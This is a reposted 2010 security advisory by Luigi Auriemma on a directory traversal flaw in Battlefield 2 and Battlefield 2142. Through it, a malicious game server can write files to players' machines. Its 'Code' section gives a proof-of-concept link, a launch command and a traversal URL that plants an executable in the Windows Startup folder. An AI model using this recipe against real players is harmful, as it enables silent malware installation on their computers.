首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
EA Battlefield 2 and Battlefield 2142 Multiple Arbitrary File Upload Vulnerabili
来源:aluigi@autistici.org 作者:Auriemma 发布时间:2010-07-08  

#######################################################################

Luigi Auriemma

Application: Refractor 2 engine
Games: Battlefield 2 <= 1.50 (aka 1.5.3153-802.0)
http://www.battlefield.ea.com/battlefield/bf2/
Battlefield 2142 <= 1.50 (aka 1.10.48.0)
http://battlefield.ea.com/battlefield/bf2142/
...
other games developed with the same engine could be
vulnerable like Battlefield Heroes
Platforms: Windows
Bug: client URLs directory traversal
Exploitation: remote, versus clients
Date: 29 Jun 2010
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


The Battlefield series is one of the most famous and played series of
games deeply devoted to multiplayer gaming.
The series is developed by DICE (http://www.dice.se) and published by
Electronic Arts.


#######################################################################

======
2) Bug
======


Each BF2 and BF2142 server has some fields where the admin can specify
the links to files and images like the sponsor and community logo.
The sponsor logo is visible immediately when the client gets the list
of servers and selects the server with the mouse (one-click, not join)
while the second one is loaded when the client joins that server.

Exist also other URLs like DemoDownloadURL, DemoIndexURL and
CustomMapsURL that can be exploited when the client joins the malicious
server.

The client performs a very simple operation, it gets the URL and
downloads the file saving it locally using its original name in the
following folder:
C:\Documents and Settings\USER\My Documents\Battlefield 2\LogoCache\SERVER
C:\Documents and Settings\USER\My Documents\Battlefield
2142\LogoCache\SERVER
where USER is the Windows account of the current user and SERVER is the
address of the web server, while LogoCache could be HttpCache if are
used the URLs for downloading demos and maps.

The vulnerability resides in the missing handling of the backslash char
with the consequence that the name of the file will include the
classical directory traversal pattern allowing a malicious server to
upload malicious executables on the clients.

Note that the loading of the URLs is automatic and doesn't seem
possible to disable this feature.


#######################################################################

===========
3) The Code
===========


http://www.exploit-db.com/sploits/bfonlywebs.zip

- launch: onlywebs.exe c:\malicious_file.exe
- start the server launcher using the following string as sponsor and
community logo URL:
http://SERVER/..\..\..\..\Start Menu\Programs\Startup\owned.exe
- Save and Start the server
- launch the client and go in the multiplayer menu
- when the refreshing of the list is terminated select or join the
malicious server
- now the file owned.exe will be available in the Startup folder of the
client and will be executed at the next login or reboot

note that the server could be not seen if you are running it on the
same machine of the client (127.0.0.1), in that case use another
computer/vm (a server or an UDP datapipe on port 29900)


#######################################################################

======
4) Fix
======


No fix.


#######################################################################


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IrcDelphi Daemon Server Denial
·Qt 4.6.3 "QSslSocketBackendPri
·ARM Polymorphic execve("/bin/s
·VLC Media Player version 1.0.5
·GSM SIM Utility Local Exploit
·NetworX version 1.0.3 suffers
·Hero DVD Remote Buffer Overflo
·HP NNM 7.53 ovwebsnmpsrv.exe B
·FathFTP 1.7 ActiveX Buffer Ove
·EvoCam Web Server OSX ROP Remo
·UFO: Alien Invasion v2.2.1 IRC
·minerCPP 0.4b Remote BOF+Forma
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved